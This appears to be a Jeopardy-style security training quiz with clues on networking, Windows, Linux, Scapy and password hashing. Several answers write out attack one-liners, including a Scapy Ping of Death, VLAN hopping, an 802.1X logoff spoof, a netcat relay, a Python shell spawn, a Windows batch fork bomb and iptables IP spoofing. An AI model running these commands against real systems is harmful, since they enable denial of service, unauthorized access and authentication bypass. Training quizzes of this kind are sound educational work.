Hacking-0b10 Jeopardy Template

Network

Windows

Linux

Python/Scapy

Password

100

A remote code execution vulnerability described by CVE-2008-4250 and patched by Microsoft on Thursday, October 23.

What is MS08-067?

100

NEGOTIATE_TYPE_MESSAGE CHALLENGE_TYPE_MESSAGE AUTHENTICATE_TYPE_MESSAGE

What are the 3 messages used in the NTLM challenge-response authentication protocol?

100

The number of the interrupt signal (SIGINT) that can be sent with CTRL-C.

What is the signal number 2?

100

$> ncat 10.0.0.1 1337 uname Linux python -c 'import pty; pty.spawn("/bin/sh")'

From terminal access, how can you get shell access with python?

100

$TheMasterPassword%%

What was Daniel's password?

200

The four (4) Nmap activated features by using the -A parameter. (3 out of 4 are asked)

What are OS detection, version detection, script scanning and traceroute.

200

Penetration tester can modify this Windows executable to get System shell access on non-encrypted computers without knowing or modifying Windows accounts.

What is C:\Windows\System32\sethc.exe useful for?

200

$> mknod backpipe p $> nc -l -p [LocalPort] 0

How do you do a netcat relay?

200

for p in fragment(IP(dst="10.10.10.3")/ICMP()/("X"*60000)): send(p)

How can you send a Ping of Death to 10.10.10.3?

200

aad3b435b51404eeaad3b435b51404ee

What is the LM Hash of an empty string?

300

This URL is used by clients of Web Proxy Autodiscovery Protocol using NetBIOS to download the configuration file and determine the proxy for a specified URL.

What is the URL http://wpad/wpad.dat? Example of wpad.dat file: >$ cat wpad.dat function FindProxyForURL(url, host) { if (isInNet(host, 192.168.0.0 255.255.0.0)) { return DIRECT } else { if (shExpMatch(url, http:*)) return PROXY 192.168.0.250:3128; if (shExpMatch(url, https:*)) return PROXY 192.168.0.250:3128; if (shExpMatch(url, ftp:*)) return PROXY 192.168.0.250:3128; return DIRECT; } }

300

sekurlsa

What is the LSASS hash dumping module in Mimikatz?

300

iptables -t nat -I POSTROUTING -o eth0 -p tcp --sport 1234 --dport 25 -j SNAT --to 10.10.10.3

What is the IPTables command to spoof the source IP address 10.10.10.3 for TCP connections with source port set to 1234 to destination port set to 25?

300

sendp(Ether()/Dot1Q(vlan=2)/Dot1Q(vlan=10)/IP(dst=target)/ICMP())

How can you jump from VLAN 2 to VLAN 10 and send an IMCP packet?

300

The "$1" field in the second part of this colon-delimited string identifies this algorithm. ibrahim:$1$hanhd/cF$3lzrzB14HceT7uc3oTmog1:14323:0:99999:7:::

How the MD5 hash algorithm is identified in the string above. --------------------------------------------------------------------- "Hash_Codes Table" --------------------------------------------------------------------- CODE ALGORITHM NOTES / DISCUSSION 1 md5 MD5 is not recommended due to ease with which rainbow tables can be created to crack a file. 2 blowfish Not NIST-approved, but very secure when used with multiple rounds. 2a blowfish Not NIST-approved, but very secure when used with multiple rounds. 3 [UNKNOWN] 4 [UNKNOWN] 5 sha256 6 sha512 Used by ubuntu 10.10 "Natty" ---------------------------------------------------------------------

400

shikata_ga_nai

What is the most popular Metasploit encoding used, the only one ranked as excellent and described as "Polymorphic XOR Additive Feedback Encoder"?

400

This algorithm is computed as follows: 1- Convert the password to unicode (using little endian) 2- Compute the MD4 hash of the unicode text

What is the NT hash algorithm?

400

This command is used to identify listening sockets as well as established connections without converting port number to port names on both MAC and Linux.

What 'lsof -Pi' used for?

400

This encryption algorithm can be implemented as below: def f(data, key): return bytearray([ord(x) ^ ord(y) for (x, y) in izip(data, cycle(key))])

How can you implement the XOR encryption algorithm?

400

This protocol is used by devices exploiting the DMA attack to bypass Windows Logon.

What is Serial Bus Protocol 2 (SBP-2)?

500

The following setting allows THIS Metasploit module to connect to a Windows machine in THIS specific context. Local Security Policy > Security Settings > Local Policies > Security Options > Network Access: Sharing and security model for local accounts: Classic - local users authenticate as themselves

What setting do you need to modify in order to connect with PsExec (exploit/windows/smb/psexec) on a machine connected to a WORKGROUP instead of a DOMAIN?

500

C:\$ type attack.bat :s start %0 goto s Compressed version: %0|%0

How is written a Forkbomb in Microsoft Windows batch scripting language?

500

vmsplice()

What is the Linux system call used for the local root exploit of kernel 2.6.17 to 2.6.24.1?

500

sendp(Ether(src="AA:BB:CC:DD:EE:FF")/EAPOL(type="logoff"))

How can you break 802.1X (dot1x) authentication of the computer with MAC address AA:BB:CC:DD:EE:FF?

500

KGS!@#$%

What is the preset ASCII string encrypted by the two DES keys used in the LM Hash algorithm?